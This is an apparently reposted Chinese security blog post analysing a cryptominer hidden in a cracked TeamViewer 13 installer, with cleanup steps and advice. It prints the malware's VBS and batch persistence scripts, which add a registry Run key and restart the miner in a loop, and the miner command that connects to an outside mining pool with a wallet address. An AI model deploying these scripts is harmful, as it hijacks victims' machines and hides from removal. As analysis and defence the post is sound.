teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件，是否能分享一下)

不提供TeamViewer激活码分享，建议使用官方免费版或购买正版授权。安装教程步骤详见网站提供的教程。

你下载的TeamViewer13破解版可能有毒

0×0故事背景

最近有个远程管理一下某内网服（tiao）务（ban）器（ji）的需求，映射到公网又不安全毕竟黑帽子这么多，思来想去之后还是觉得老老实实装个Teamviewer最靠谱，度娘一下发现还真的不少破解版资源可以下载，于是随意下载一个破解版准备开始操作。

0×1安装过程

先看一下文件描述信息也没有发现什么问题，就开始下一步安装了。

安装完成了功能正常，一切OK，渐渐的电脑开始卡到爆，敏感的白帽子有一种不好的预感

0×2问题排查

开始仔细的检查一下进程列表在最后发现了一个奇怪的进程，居然被植入了挖矿病毒这个也太明显了吧，也不搞点进程注入无文件攻击之类的高端技术，系统盘下面也多了不少.bat与.vbs文件。

直接结束了挖矿的进程之后又自动起来了，还是看看这些同伴里面到底写了什么玩意。

0.Servicecrsssr.vbs：

imWShellSetWShell=CreateObject("WScript.Shell")WShell.Run"%windir%winvprse.bat",0SetWShell=Nothing

1.Winprs.bat：

@EchoOffREGADDHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorer un/v"Chrome"/f/tREG_SZ/d"%windir%servicecrsssr.vbs"Exit

2.Winvpr.vbs：

imWShellSetWShell=CreateObject("WScript.Shell")WShell.Run"winprs.bat",0SetWShell=Nothing

3.Winvprse.bat：

@echooffSETLOCALEnableExtensions:starttimeout/t160/nobreakgt;NULechoofftasklist/FI"IMAGENAMEeqwmipvrse.exe"2gt;NUL|find/I/N"wmipvrse.exe"gt;NULif"%ERRORLEVEL%"=="0"gotostarttasklist/FI"IMAGENAMEeqwmipvrse.exe"2gt;NUL|find/I/N"wmipvrse.exe"gt;NULif"%ERRORLEVEL%"=="1"gotoprocessnotrunning:processnotrunningstart"""%windir%xdgaudio.vbs"gotostartexit

4.xdgaudio.vbs

DimWShell

SetWShell=CreateObject("WScript.Shell")WShell.Run"wmipvrse.exe--cpu-priority2--cpu-affinity2-acryptonight-ostratum+tcp://krb.crypto-coins.club:5555-uKjCJtxsXLAd4hUBXAUKxPSPn3L2YaAgihUUc8SQAaCfeG1QpN3kNyLyBRjRUdzmaAdYhMyoZJvUMceBuWcR3a9rnA3U4EBJ-px",0

SetWShell=Nothing

5.Wmipvrse.exe

矿池与钱包都这么出来了，看看到底挖了多少钱。

0×3逆向分析

对Wmipvrse.exe这个进程里面的东西还是感到好奇，决定还是看一看，已经加壳了不过还好是UPX的标准壳可直接脱。

CPU-minergithub上面的开源代码

0×4病毒清理

事到如此根据几个vbs与bat文件的内容，运行原理还是比较清楚了，就动手清理了。

Step1：使用PCHunter删除6个病毒母体

servicecrsssr.vbs

Winprs.bat

Winvpr.vbs

Winvprse.bat

Wmipvrse.exe

xdgaudio.vbs

Step2：清除注册表

0×5总结

1.下载软件尽量选择官方平台或者可信的第三方软件平台。

2.天下没有白吃的午餐，破解版软件里面可能含有一些让你惊喜的病毒木马后门，也许是一个大礼包呢。

3.安全无小事，日常需注意。

*本文作者：si1ence，转载自FreeBuf.COM